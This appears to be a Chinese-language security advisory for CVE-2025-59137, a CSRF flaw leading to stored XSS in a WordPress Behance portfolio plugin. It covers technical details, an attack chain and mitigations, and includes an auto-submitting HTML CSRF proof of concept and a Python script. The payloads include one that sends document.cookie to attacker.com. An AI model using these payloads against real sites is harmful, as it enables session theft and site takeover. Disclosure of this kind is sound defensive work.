CVE-2025-59137: Behance Portfolio Manager CSRF导致存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-59137

漏洞类型

CSRF + 存储型XSS

CVSS评分

7.1 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

eleopard Behance Portfolio Manager (WordPress Plugin: portfolio-manager-powered-by-behance)

漏洞概述

CVE-2025-59137是WordPress插件Behance Portfolio Manager中的一个高危安全漏洞，CVSS评分7.1。该漏洞属于跨站请求伪造(CSRF)与存储型跨站脚本(XSS)的复合漏洞，攻击者可利用此漏洞在受害者浏览器中执行任意JavaScript代码，从而窃取敏感信息、劫持用户会话或进行进一步的攻击。

该插件用于在WordPress网站上展示Behance作品集功能。由于插件在处理用户输入时缺乏适当的CSRF令牌验证和输入过滤，攻击者可以构造恶意请求，在管理员不知情的情况下，将包含恶意脚本的内容存储到数据库中。当其他用户访问受影响的页面时，恶意脚本会自动执行，导致存储型XSS攻击成功。

漏洞影响范围涵盖Behance Portfolio Manager插件1.7.5及以下所有版本。由于WordPress插件的广泛使用，此漏洞可能影响大量网站。攻击成功后，攻击者可以获取管理员权限、窃取会话cookie、修改网站内容或重定向用户到恶意网站。建议所有使用该插件的用户立即采取修复措施或升级到最新版本。

技术细节

该漏洞存在于Behance Portfolio Manager插件的portfolio-manager-powered-by-behance组件中，主要涉及两个安全缺陷的组合利用。

首先，插件缺少CSRF保护机制。在WordPress插件开发中，应当使用wp_nonce_field()生成nonce令牌并在处理请求时验证nonce值。然而该插件在处理用户提交的数据时，未实施此类保护，允许攻击者诱导已登录管理员执行非预期的操作。攻击者可以构造一个包含恶意表单的网页，当管理员访问时，自动提交请求到目标WordPress站点。

其次，存储型XSS漏洞源于输入验证不足。插件在保存用户输入的数据时，未对特殊字符进行适当的HTML转义或过滤。攻击者可以在表单字段中注入JavaScript代码，如<script>alert(document.cookie)</script>或更复杂的窃取cookie脚本。这些恶意数据被存储到数据库后，会在页面加载时原样输出到HTML中，导致脚本在受害者浏览器中执行。

利用此漏洞的攻击流程：攻击者创建一个恶意网页，其中包含自动提交的表单，目标指向易受攻击的WordPress站点。表单数据包含XSS payload。当管理员访问该恶意页面时，浏览器自动提交表单，payload被存储到数据库。之后任何访问相关页面的用户都会触发XSS执行。由于攻击代码存储在数据库中，即使管理员退出登录，只要页面被访问，攻击就会持续有效。

攻击链分析

STEP 1

步骤1

攻击者创建恶意网页，包含自动提交的表单，指向目标WordPress站点的插件处理端点

STEP 2

步骤2

表单中包含XSS payload（如<script>标签或事件处理器），用于注入恶意JavaScript代码

STEP 3

步骤3

攻击者通过钓鱼邮件、社交工程或恶意链接诱导目标网站管理员访问恶意网页

STEP 4

步骤4

管理员浏览器自动向目标站点发送POST请求，由于缺少CSRF验证，请求被成功处理

STEP 5

步骤5

恶意payload被存储到WordPress数据库中，攻击代码持久化在系统中

STEP 6

步骤6

当其他用户访问展示作品集的页面时，存储的XSS payload被执行，攻击者可以窃取cookie、会话信息或进行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CSRF PoC for CVE-2025-59137: Stored XSS via CSRF -->
<!DOCTYPE html>
<html>
<head>
    <title>CSRF Attack PoC - CVE-2025-59137</title>
</head>
<body>
    <h1>CSRF Attack PoC for Behance Portfolio Manager</h1>
    <p>This PoC demonstrates the CSRF vulnerability that leads to Stored XSS.</p>
    
    <form action="http://target-wordpress-site/wp-admin/admin-post.php" method="POST" id="csrf-form">
        <!-- Plugin's action parameter -->
        <input type="hidden" name="action" value="save_portfolio">
        
        <!-- Portfolio name field with XSS payload -->
        <input type="hidden" name="portfolio_name" value='<script>alert("XSS by CVE-2025-59137")</script>'>
        
        <!-- Additional fields that might be required -->
        <input type="hidden" name="portfolio_description" value='<img src=x onerror="fetch(\'http://attacker.com/steal?c=\'+document.cookie)">'>
        <input type="hidden" name="behance_project_id" value="123456">
        <input type="hidden" name="submit" value="Save Portfolio">
    </form>

    <script>
        // Auto-submit form when page loads
        document.getElementById('csrf-form').submit();
        console.log('CSRF PoC submitted');
    </script>
    
    <p>If you see this message, the form has been submitted.</p>
</body>
</html>

<!-- 
# Python PoC Script
import requests

TARGET_URL = "http://target-wordpress-site/wp-admin/admin-post.php"
XSS_PAYLOAD = '<script>alert("CVE-2025-59137 Stored XSS")</script>'

def exploit_csrf():
    data = {
        'action': 'save_portfolio',
        'portfolio_name': XSS_PAYLOAD,
        'portfolio_description': 'Malicious portfolio created via CSRF',
        'behance_project_id': '123456',
        'submit': 'Save Portfolio'
    }
    
    # Send POST request without CSRF token
    response = requests.post(TARGET_URL, data=data)
    print(f"Response status: {response.status_code}")
    
    if response.status_code == 200:
        print("PoC executed successfully - XSS payload stored")

if __name__ == "__main__":
    exploit_csrf()
-->

影响范围

Behance Portfolio Manager (portfolio-manager-powered-by-behance) <= 1.7.5

所有从初始版本到1.7.5的版本均受影响

防御指南

临时缓解措施

在等待官方修复期间，可以采取以下临时缓解措施：1) 临时禁用Behance Portfolio Manager插件直到完成修复；2) 使用Web应用防火墙(WAF)规则阻止针对该插件端点的异常请求；3) 手动审查数据库中wp_options和相关文章/作品集表，删除可疑的XSS payload；4) 为管理员账户启用双因素认证(2FA)，降低账户被劫持的风险；5) 限制管理员账户的使用范围，避免在不可信的网页环境中登录WordPress后台。